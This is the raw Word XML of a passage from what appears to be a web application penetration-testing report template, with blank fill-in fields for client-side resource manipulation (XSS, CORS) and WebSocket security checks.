        <w:jc w:val="left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0B3712" w:rsidRPr="00A51A96" w14:paraId="721694E6" w14:textId="77777777" w:rsidTr="00D726B9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2FD74FA1" w14:textId="2EF3A10F" w:rsidR="000B3712" w:rsidRPr="003C713F" w:rsidRDefault="000B3712" w:rsidP="005232C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462042">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Test 12.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r w:rsidRPr="0046204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221CF9" w:rsidRPr="00221CF9">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test for Client-side Resource Manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BF0AB90" w14:textId="77777777" w:rsidR="000B3712" w:rsidRPr="00D726B9" w:rsidRDefault="000B3712" w:rsidP="00A621A8">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/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55"/>
        <w:gridCol w:w="6705"/>
      </w:tblGrid>
      <w:tr w:rsidR="00323910" w:rsidRPr="00C779B5" w14:paraId="234782F3" w14:textId="77777777" w:rsidTr="00224728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776642BF" w14:textId="77777777" w:rsidR="00323910" w:rsidRPr="00C779B5" w:rsidRDefault="00323910" w:rsidP="002247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79B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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="291B9C4A" w14:textId="77777777" w:rsidR="00323910" w:rsidRPr="00C779B5" w:rsidRDefault="0032391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23910" w:rsidRPr="00C779B5" w14:paraId="62F30D76" w14:textId="77777777" w:rsidTr="00224728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0977635F" w14:textId="77777777" w:rsidR="00323910" w:rsidRPr="00C779B5" w:rsidRDefault="00323910" w:rsidP="002247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79B5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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="442BE4BD" w14:textId="77777777" w:rsidR="00323910" w:rsidRPr="00C779B5" w:rsidRDefault="0032391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23910" w:rsidRPr="00C779B5" w14:paraId="4162712E" w14:textId="77777777" w:rsidTr="00224728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215849CD" w14:textId="77777777" w:rsidR="00323910" w:rsidRPr="00C779B5" w:rsidRDefault="00323910" w:rsidP="002247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79B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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53140075" w14:textId="77777777" w:rsidR="00323910" w:rsidRPr="00C779B5" w:rsidRDefault="0032391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23910" w:rsidRPr="00C779B5" w14:paraId="77034688" w14:textId="77777777" w:rsidTr="00224728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6EA17379" w14:textId="09712535" w:rsidR="00323910" w:rsidRPr="00C779B5" w:rsidRDefault="000F780C" w:rsidP="002247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0F780C"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 Injection Points (Sinks)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42D7C9D7" w14:textId="4681C151" w:rsidR="00323910" w:rsidRPr="00BB2F5E" w:rsidRDefault="0032391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BB2F5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4A19B5" w:rsidRPr="004A19B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iframe, script src, link href, object data, etc.</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB2F5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B6711B2" w14:textId="77777777" w:rsidR="00323910" w:rsidRDefault="0032391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C1EDCA3" w14:textId="77777777" w:rsidR="00323910" w:rsidRPr="00C779B5" w:rsidRDefault="0032391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23910" w:rsidRPr="00C779B5" w14:paraId="381DA7B7" w14:textId="77777777" w:rsidTr="00224728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53B5D035" w14:textId="52CB6C09" w:rsidR="00323910" w:rsidRPr="005D0F4F" w:rsidRDefault="00F620E0" w:rsidP="002247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F620E0">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>JavaScript Resource Injection Vulnerability Detected?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01016463" w14:textId="7E61A5E9" w:rsidR="00323910" w:rsidRDefault="0032391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766B15" w:rsidRPr="00766B15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Affected Elements, Examples if found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D74E95B" w14:textId="77777777" w:rsidR="00323910" w:rsidRDefault="0032391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9291528" w14:textId="77777777" w:rsidR="00323910" w:rsidRPr="00BB2F5E" w:rsidRDefault="0032391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23910" w:rsidRPr="00C779B5" w14:paraId="01BD0726" w14:textId="77777777" w:rsidTr="00224728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64B7E33B" w14:textId="49842263" w:rsidR="00323910" w:rsidRPr="00AF0DE9" w:rsidRDefault="00130018" w:rsidP="002247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130018">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Confirmed XSS via JavaScript Resource Injection?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D9540C5" w14:textId="0EFCE642" w:rsidR="00323910" w:rsidRDefault="0032391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374313" w:rsidRPr="0037431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Malicious URL Example if exploited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61E2CCCF" w14:textId="77777777" w:rsidR="00323910" w:rsidRDefault="0032391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54D81C28" w14:textId="77777777" w:rsidR="00323910" w:rsidRDefault="0032391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23910" w:rsidRPr="00C779B5" w14:paraId="15596CEE" w14:textId="77777777" w:rsidTr="00224728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4BC7DD66" w14:textId="20C24EB8" w:rsidR="00323910" w:rsidRPr="00D32742" w:rsidRDefault="00A67ED3" w:rsidP="002247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A67ED3">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>CORS Exploitation Possible?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D856C6C" w14:textId="68D0941B" w:rsidR="00323910" w:rsidRDefault="0032391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A67ED3" w:rsidRPr="00A67ED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Yes/No, Affected Requests, Vulnerable Resources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29D37F7" w14:textId="77777777" w:rsidR="00323910" w:rsidRDefault="0032391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478B235" w14:textId="77777777" w:rsidR="00323910" w:rsidRDefault="0032391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583B0D" w:rsidRPr="00C779B5" w14:paraId="7D3FC94D" w14:textId="77777777" w:rsidTr="00224728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4EC94684" w14:textId="1C7B290E" w:rsidR="00583B0D" w:rsidRPr="00A67ED3" w:rsidRDefault="00900C35" w:rsidP="002247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>Approach Followed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31F7BDEB" w14:textId="083DAC5A" w:rsidR="00583B0D" w:rsidRDefault="00900C35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</w:t>
            </w:r>
            <w:r w:rsidR="002F0CB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*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 xml:space="preserve">List out </w:t>
            </w:r>
            <w:r w:rsidR="002F0CB7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for the individual tests]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C2D1980" w14:textId="77777777" w:rsidR="002F0CB7" w:rsidRDefault="002F0CB7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1AA313EA" w14:textId="2A4BBE58" w:rsidR="002F0CB7" w:rsidRDefault="002F0CB7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23910" w:rsidRPr="00C779B5" w14:paraId="2DF07F6C" w14:textId="77777777" w:rsidTr="00224728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22B4997D" w14:textId="593C9895" w:rsidR="00323910" w:rsidRPr="00196D1A" w:rsidRDefault="003018B6" w:rsidP="002247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018B6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Exploit Paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05711EA4" w14:textId="1324EBDC" w:rsidR="00323910" w:rsidRDefault="0032391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3018B6" w:rsidRPr="003018B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XSS, CORS Exploitation, Resource Hijacking, Data Exfiltration,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FB11EF7" w14:textId="77777777" w:rsidR="00323910" w:rsidRDefault="0032391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28FDDC13" w14:textId="77777777" w:rsidR="00323910" w:rsidRDefault="0032391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323910" w:rsidRPr="00C779B5" w14:paraId="20B384A0" w14:textId="77777777" w:rsidTr="00224728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0181F058" w14:textId="77777777" w:rsidR="00323910" w:rsidRPr="00C779B5" w:rsidRDefault="00323910" w:rsidP="002247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 xml:space="preserve">Other </w:t>
            </w:r>
            <w:r w:rsidRPr="005B4AF3">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b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6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70EE135E" w14:textId="77777777" w:rsidR="00323910" w:rsidRPr="00C779B5" w:rsidRDefault="00323910" w:rsidP="00323910">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="219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869EE37" w14:textId="77777777" w:rsidR="00323910" w:rsidRPr="00C779B5" w:rsidRDefault="00323910" w:rsidP="00323910">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="219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2E49D1C" w14:textId="77777777" w:rsidR="00323910" w:rsidRPr="00C779B5" w:rsidRDefault="00323910" w:rsidP="00323910">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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76BE8A7" w14:textId="77777777" w:rsidR="00323910" w:rsidRPr="00C779B5" w:rsidRDefault="00323910" w:rsidP="00323910">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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31C93253" w14:textId="77777777" w:rsidR="00323910" w:rsidRPr="00C779B5" w:rsidRDefault="00323910" w:rsidP="00323910">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="21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E9C63F6" w14:textId="77777777" w:rsidR="00323910" w:rsidRPr="00C779B5" w:rsidRDefault="0032391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323910" w:rsidRPr="00C779B5" w14:paraId="441499B4" w14:textId="77777777" w:rsidTr="00224728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21F3A0B4" w14:textId="77777777" w:rsidR="00323910" w:rsidRPr="00C779B5" w:rsidRDefault="00323910" w:rsidP="00224728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79B5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705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A68E42C" w14:textId="77777777" w:rsidR="00323910" w:rsidRPr="00C779B5" w:rsidRDefault="00323910" w:rsidP="00323910">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="220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5062A1A" w14:textId="77777777" w:rsidR="00323910" w:rsidRPr="00C779B5" w:rsidRDefault="00323910" w:rsidP="00323910">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22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889F12D" w14:textId="77777777" w:rsidR="00323910" w:rsidRPr="00C779B5" w:rsidRDefault="00323910" w:rsidP="00323910">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22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EF61AFE" w14:textId="77777777" w:rsidR="00323910" w:rsidRPr="00C779B5" w:rsidRDefault="00323910" w:rsidP="00323910">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22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27685B3" w14:textId="77777777" w:rsidR="00323910" w:rsidRPr="00C779B5" w:rsidRDefault="00323910" w:rsidP="00323910">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22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7F3EE94" w14:textId="77777777" w:rsidR="00323910" w:rsidRPr="00C779B5" w:rsidRDefault="0032391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43BDA7E1" w14:textId="77777777" w:rsidR="00635AE2" w:rsidRDefault="00635AE2" w:rsidP="00635AE2">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Results Analysis: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DDE3EC0" w14:textId="77777777" w:rsidR="00635AE2" w:rsidRPr="00B07F1E" w:rsidRDefault="00635AE2" w:rsidP="00635AE2">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b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35AE2" w:rsidRPr="005D2C80" w14:paraId="20A36878" w14:textId="77777777" w:rsidTr="005232C4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="321A27B0" w14:textId="77777777" w:rsidR="00635AE2" w:rsidRPr="005D2C80" w:rsidRDefault="00635AE2" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="30715FE8" w14:textId="77777777" w:rsidR="00635AE2" w:rsidRPr="005D2C80" w:rsidRDefault="00635AE2" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="08792060" w14:textId="77777777" w:rsidR="00635AE2" w:rsidRDefault="00635AE2" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="29DBB53A" w14:textId="77777777" w:rsidR="00635AE2" w:rsidRDefault="00635AE2" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6CC44E4E" w14:textId="77777777" w:rsidR="00635AE2" w:rsidRDefault="00635AE2" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="41FCF72E" w14:textId="77777777" w:rsidR="00635AE2" w:rsidRPr="005D2C80" w:rsidRDefault="00635AE2" w:rsidP="005232C4">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="106DF0C5" w14:textId="77777777" w:rsidR="00635AE2" w:rsidRDefault="00635AE2" w:rsidP="00A621A8">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9140" w:type="dxa"/>
        <w:tblInd w:w="13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9140"/>
      </w:tblGrid>
      <w:tr w:rsidR="00566527" w:rsidRPr="00A51A96" w14:paraId="6F543025" w14:textId="77777777" w:rsidTr="007D5E71">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="740B449D" w14:textId="7B6FBD1D" w:rsidR="00566527" w:rsidRPr="003C713F" w:rsidRDefault="00566527" w:rsidP="005232C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462042">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Test 12.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidRPr="0046204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7C78F8" w:rsidRPr="007C78F8">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Test WebSockets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E5623ED" w14:textId="6D46BB2D" w:rsidR="004418A8" w:rsidRPr="007D5E71" w:rsidRDefault="004418A8" w:rsidP="004418A8">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1640"/>
        </w:tabs>
        <w:rPr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55"/>
        <w:gridCol w:w="6705"/>
      </w:tblGrid>
      <w:tr w:rsidR="007578F0" w:rsidRPr="00C779B5" w14:paraId="4625A1E2" w14:textId="77777777" w:rsidTr="00BE4302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05BA2B40" w14:textId="77777777" w:rsidR="007578F0" w:rsidRPr="00C779B5" w:rsidRDefault="007578F0" w:rsidP="00BE430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79B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Organization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5219E2FB" w14:textId="77777777" w:rsidR="007578F0" w:rsidRPr="00C779B5" w:rsidRDefault="007578F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578F0" w:rsidRPr="00C779B5" w14:paraId="443A3E57" w14:textId="77777777" w:rsidTr="00BE4302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2CC027C1" w14:textId="77777777" w:rsidR="007578F0" w:rsidRPr="00C779B5" w:rsidRDefault="007578F0" w:rsidP="00BE430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79B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62C1E9FB" w14:textId="77777777" w:rsidR="007578F0" w:rsidRPr="00C779B5" w:rsidRDefault="007578F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578F0" w:rsidRPr="00C779B5" w14:paraId="58ADF495" w14:textId="77777777" w:rsidTr="00BE4302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097668A0" w14:textId="77777777" w:rsidR="007578F0" w:rsidRPr="00C779B5" w:rsidRDefault="007578F0" w:rsidP="00BE430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79B5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Target Web Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E986D83" w14:textId="77777777" w:rsidR="007578F0" w:rsidRPr="00C779B5" w:rsidRDefault="007578F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578F0" w:rsidRPr="00C779B5" w14:paraId="6C84939A" w14:textId="77777777" w:rsidTr="00BE4302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248CE899" w14:textId="713AA483" w:rsidR="007578F0" w:rsidRPr="00C779B5" w:rsidRDefault="00E34BC1" w:rsidP="00BE430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E34BC1">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Identified WebSocket Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CC401B5" w14:textId="59CFEC26" w:rsidR="007578F0" w:rsidRPr="00BB2F5E" w:rsidRDefault="007578F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 w:rsidRPr="00BB2F5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797326" w:rsidRPr="0079732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ws:// or wss://, List of WebSocket Endpoints Found</w:t>
            </w:r>
            <w:r w:rsidRPr="00BB2F5E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16826B93" w14:textId="77777777" w:rsidR="007578F0" w:rsidRDefault="007578F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465B2AE" w14:textId="77777777" w:rsidR="007578F0" w:rsidRPr="00C779B5" w:rsidRDefault="007578F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578F0" w:rsidRPr="00C779B5" w14:paraId="287F5258" w14:textId="77777777" w:rsidTr="00BE4302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351F6558" w14:textId="0D711268" w:rsidR="007578F0" w:rsidRPr="005D0F4F" w:rsidRDefault="004A0FA4" w:rsidP="00BE430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A0FA4">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Origin Validation Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="107FB81D" w14:textId="73D383B2" w:rsidR="007578F0" w:rsidRDefault="007578F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230D23" w:rsidRPr="00230D23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Allowed Cross-Domain Access? Yes/No, Risk Details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0EC6ED88" w14:textId="77777777" w:rsidR="007578F0" w:rsidRDefault="007578F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0932857" w14:textId="77777777" w:rsidR="007578F0" w:rsidRPr="00BB2F5E" w:rsidRDefault="007578F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7578F0" w:rsidRPr="00C779B5" w14:paraId="2D037A11" w14:textId="77777777" w:rsidTr="00BE4302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3786D169" w14:textId="3A26A655" w:rsidR="007578F0" w:rsidRPr="00AF0DE9" w:rsidRDefault="00C51304" w:rsidP="00BE430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51304">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Confidentiality &amp; Integrity Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A1C8D83" w14:textId="46C98A12" w:rsidR="007578F0" w:rsidRDefault="007578F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C51304" w:rsidRPr="00C51304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Uses wss://? Yes/No, SSL Weaknesses Found?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446DAD03" w14:textId="77777777" w:rsidR="007578F0" w:rsidRDefault="007578F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07EF0EC" w14:textId="77777777" w:rsidR="007578F0" w:rsidRDefault="007578F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3E931E70" w14:textId="77777777" w:rsidR="009E4B76" w:rsidRDefault="009E4B76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7578F0" w:rsidRPr="00C779B5" w14:paraId="1F8E0D0B" w14:textId="77777777" w:rsidTr="00BE4302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796EADAC" w14:textId="40C02625" w:rsidR="007578F0" w:rsidRPr="00D32742" w:rsidRDefault="0040274B" w:rsidP="00BE430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0274B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Authentication Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="260994F9" w14:textId="710E0EB4" w:rsidR="007578F0" w:rsidRDefault="007578F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40274B" w:rsidRPr="0040274B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Weak Authentication Controls? Yes/No, Observed Issues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58A4E71A" w14:textId="77777777" w:rsidR="007578F0" w:rsidRDefault="007578F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8BD885C" w14:textId="77777777" w:rsidR="009E4B76" w:rsidRDefault="009E4B76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4942B7B2" w14:textId="77777777" w:rsidR="007578F0" w:rsidRDefault="007578F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7578F0" w:rsidRPr="00C779B5" w14:paraId="312614C4" w14:textId="77777777" w:rsidTr="00BE4302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27972F9F" w14:textId="031A9CA2" w:rsidR="007578F0" w:rsidRPr="00A67ED3" w:rsidRDefault="0040274B" w:rsidP="00BE430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40274B">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Authorization Check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E0AAB52" w14:textId="552C9411" w:rsidR="007578F0" w:rsidRDefault="007578F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AA13E6" w:rsidRPr="00AA13E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Access Control Bypass Possible? Yes/No, Unauthorized Access Detected?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2A5B4A59" w14:textId="77777777" w:rsidR="007578F0" w:rsidRDefault="007578F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6A37EA98" w14:textId="77777777" w:rsidR="009E4B76" w:rsidRDefault="009E4B76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B3FFEFE" w14:textId="77777777" w:rsidR="007578F0" w:rsidRDefault="007578F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B21856" w:rsidRPr="00C779B5" w14:paraId="30793630" w14:textId="77777777" w:rsidTr="00BE4302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4F5F09E5" w14:textId="3B87759D" w:rsidR="00B21856" w:rsidRPr="0040274B" w:rsidRDefault="00B21856" w:rsidP="00BE430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B21856">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Input Sanitization Testing Results</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F2A4BDE" w14:textId="77777777" w:rsidR="00B21856" w:rsidRDefault="00B21856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Pr="00B21856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Injection Vulnerabilities Found? Yes/No, Details of Exploitable Inputs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8CBC2E2" w14:textId="77777777" w:rsidR="00B21856" w:rsidRDefault="00B21856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89A1991" w14:textId="77777777" w:rsidR="009E4B76" w:rsidRDefault="009E4B76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0C0B81A4" w14:textId="632C5FEB" w:rsidR="00B21856" w:rsidRDefault="00B21856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7578F0" w:rsidRPr="00C779B5" w14:paraId="3FF46727" w14:textId="77777777" w:rsidTr="00BE4302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1CF7696A" w14:textId="77777777" w:rsidR="007578F0" w:rsidRPr="00196D1A" w:rsidRDefault="007578F0" w:rsidP="00BE430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3018B6">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Potential Exploit Paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A93C28D" w14:textId="69700BB7" w:rsidR="007578F0" w:rsidRDefault="007578F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[*</w:t>
            </w:r>
            <w:r w:rsidR="00BE4302" w:rsidRPr="00997D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Cross-domain Hijacking</w:t>
            </w:r>
            <w:r w:rsidR="00997DD1" w:rsidRPr="00997DD1"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, Injection Attacks, Authentication Bypass, etc.</w:t>
            </w:r>
            <w:r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  <w:t>]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="719B7A27" w14:textId="77777777" w:rsidR="007578F0" w:rsidRDefault="007578F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  <w:p w14:paraId="74AA2FB0" w14:textId="77777777" w:rsidR="007578F0" w:rsidRDefault="007578F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i/>
                <w:iCs/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007578F0" w:rsidRPr="00C779B5" w14:paraId="5C719B56" w14:textId="77777777" w:rsidTr="00BE4302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1E261285" w14:textId="77777777" w:rsidR="007578F0" w:rsidRPr="00C779B5" w:rsidRDefault="007578F0" w:rsidP="00BE430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>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t xml:space="preserve">Other </w:t>
            </w:r>
            <w:r w:rsidRPr="005B4AF3">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Security Risks Identified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6705" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
